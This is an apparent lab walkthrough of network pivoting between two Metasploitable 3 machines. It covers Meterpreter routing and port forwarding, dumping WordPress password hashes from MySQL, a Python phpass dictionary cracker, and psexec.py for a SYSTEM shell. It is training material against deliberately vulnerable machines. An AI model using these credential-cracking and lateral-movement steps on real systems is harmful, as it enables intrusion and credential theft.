Premise

In this walkthrough, we demonstrated the concept of network pivoting. We compromised the main Windows target, discovered a second Windows server on a network reachable only through the first, and gained access to it as well, using credentials recovered from its MySQL server.

Skills Learned

  • Windows Penetration Testing
  • MySQL Server enumeration and exploitation
  • Network Pivoting
  • Metasploit

Finding a Hidden Network

I started with a privileged Meterpreter session on the first Metasploitable 3 machine. The first thing I did was run ifconfig to list the network interfaces of the compromised host. I found two: one was the standard VirtualBox adapter, but the other was on a completely different network, 192.168.56.x. This was my first clue that there was more to this network than I could see from my attacking machine.

Since I couldn't directly reach this new network, I had to create a "pivot", a tunnel through the compromised machine. I used the Metasploit module post/multi/manage/autoroute to add a route for the new subnet via my Meterpreter session. The route lives inside the framework, not in the operating system: it tells Metasploit modules to send traffic for that subnet through the session, while tools running outside msfconsole still cannot reach it unless they are also proxied through the session.

Exploring the New Territory

With my route in place, I started scanning the new network for open ports. I used db_nmap from within Metasploit and found that port 3306 (MySQL) was open on one of the hosts. This was a great find because databases often contain valuable information, such as user credentials. One caveat: db_nmap just runs the local nmap binary, which knows nothing about Metasploit's routing table, so a host that is reachable only through a session has to be scanned with a route-aware module such as auxiliary/scanner/portscan/tcp, or by running nmap through auxiliary/server/socks_proxy and proxychains.

To connect to the MySQL server, I used another useful technique, port forwarding. I set up a rule in my Meterpreter session to forward a local port on my machine to the MySQL port on the remote machine: Meterpreter opens a listener on the attacking host, and every connection it accepts is relayed by the agent on the pivot to the target. This allowed me to connect to the remote database as if it were running on my own computer.

Cracking the Database

Once I was connected to the MySQL server, I found a WordPress database. I dumped the wp_users table and found usernames and password hashes for a couple of users, including 'admin' and 'vagrant'. WordPress has long stored these as phpass "portable" hashes (prefix $P$), which are iterated MD5 and crack quickly against a wordlist. I cracked them using John the Ripper and got the passwords: 'exploit' and 'vagrant'.
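The same cracking step done by hand, as an added example that is not part of the original walkthrough: a re-implementation of the phpass scheme WordPress uses for $P$ hashes, plus a dictionary attack over a wp_users dump. The rows and wordlist are constructed for this demo; the 'admin' hash is the published phpass test vector for the password 'test12345', the other two hashes are generated by the code itself, and the login names are borrowed from the write-up only for flavour.

```python
"""Dictionary attack on WordPress phpass ("portable") hashes.

Added example, not code from the original walkthrough or from WordPress.
Re-implements the phpass algorithm so the John step can be reproduced and
understood without John. Sample data below is constructed.
"""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data, count):
    """phpass's own base64 variant (not RFC 4648): 3 bytes -> 4 chars, low bits first."""
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def phpass_crypt(password, setting):
    """Hash `password` under `setting` = '$P$' (or '$H$') + cost char + 8-char salt.

    Returns None for anything that is not a phpass hash (e.g. a bcrypt '$2y$' value),
    so a dump containing other formats does not silently produce false negatives.
    """
    if len(setting) < 12 or setting[:3] not in ("$P$", "$H$"):
        return None
    count_log2 = ITOA64.find(setting[3])
    if count_log2 < 7 or count_log2 > 30:  # same bounds phpass itself enforces
        return None
    salt = setting[4:12].encode()
    pw = password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(1 << count_log2):  # 2**count_log2 further rounds; 8192 for WordPress's '$P$B'
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_check(password, stored):
    """True if `password` produces the stored phpass hash."""
    return phpass_crypt(password, stored) == stored


def crack_wp_users(rows, wordlist):
    """rows: (user_login, user_pass) pairs as dumped from wp_users.

    Returns {user_login: cleartext} for every row some wordlist entry matches;
    users whose password is not in the list are simply absent from the result.
    """
    found = {}
    for login, stored in rows:
        for candidate in wordlist:
            if phpass_check(candidate, stored):
                found[login] = candidate
                break
    return found


# Constructed wp_users dump (not the walkthrough's real data).
SAMPLE_ROWS = [
    ("admin", "$P$9IQRaTwmfeRo7ud9Fh4E2PdI0S3r.L0"),               # phpass test vector for 'test12345'
    ("vagrant", phpass_crypt("vagrant", "$P$BZx9kq2mP")),          # generated here, cost 'B' like WordPress
    ("editor", phpass_crypt("N0t-in-the-l1st!", "$P$BhV3qLp8s")),  # not in the wordlist, stays uncracked
]
WORDLIST = ["password", "admin", "vagrant", "exploit", "test12345"]  # constructed stand-in for rockyou

if __name__ == "__main__":
    print(crack_wp_users(SAMPLE_ROWS, WORDLIST))  # -> {'admin': 'test12345', 'vagrant': 'vagrant'}
```

With real John, the equivalent is `--format=phpass`; the hash prefix tells you which it is, and the cost character after `$P$` (B for WordPress) is the only thing standing between you and the wordlist, which is why these fall so fast.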

I tried to use these credentials to log into the WordPress site, but I had trouble reaching the login page: it seemed to be running on a non-standard port that I couldn't immediately find. So I decided to switch gears and try a different approach.

The Final Takeover

Since I had valid credentials for the 'vagrant' user, I decided to try to get a shell on the second machine directly. I used Impacket's psexec.py to connect to the machine with the 'vagrant' username and password. To make this work, I had to set up another port forward, this time for the SMB service on port 445.

psexec.py worked like a charm, and I was greeted with a command prompt on the second machine. I ran whoami, and to my delight, I had nt authority\system privileges! That is expected with psexec: it uploads a service binary over the ADMIN$ share and starts it, so the shell runs as the service (SYSTEM) rather than as the logon user, but it only works because the account, here 'vagrant', is a local administrator on the target. I had successfully pivoted from one machine to another and gained full control of the second host. 🤘

Technical Commands I Used

Here are some of the key commands that I used throughout this process:

  • ifconfig: To list the network interfaces on the compromised host from within Meterpreter.
  • use post/multi/manage/autoroute: The Metasploit module for creating a route to a new network through a session (its SUBNET and SESSION options select the network and the session to route through).
  • db_nmap -p 3306 -sV 192.168.56.1/24: To scan for the MySQL port on the new network. Note that db_nmap runs the local nmap binary and does not use Metasploit's routes; to scan through a session use auxiliary/scanner/portscan/tcp, or nmap via a SOCKS proxy.
  • portfwd add -l 3306 -p 3306 -r 192.168.56.1: To forward the remote MySQL port (-p on host -r) to local port 3306 (-l) on my machine.
  • mysql -u root -h 127.0.0.1: To connect to the forwarded MySQL port. The -h 127.0.0.1 matters: with no host, or with localhost, the mysql client uses the Unix socket and never touches the forwarded TCP port.
  • SELECT user_login, user_pass FROM wp_users;: The SQL query to dump the WordPress user credentials.
  • sudo john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt: To crack the password hashes. sudo is not needed for john; if it does not auto-detect the WordPress hashes, add --format=phpass.
  • portfwd add -l 1122 -p 445 -r 192.168.56.1: To forward the SMB port for psexec.py.
  • python psexec.py vagrant@127.0.0.1: To get a shell on the second machine. As written this connects to 127.0.0.1:445, not to the forwarded local port 1122; the local listener and the port psexec.py targets have to match (for example by forwarding with -l 445, which requires root on the attacking machine and nothing else bound to 445).
  • whoami: To confirm SYSTEM-level privileges.

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.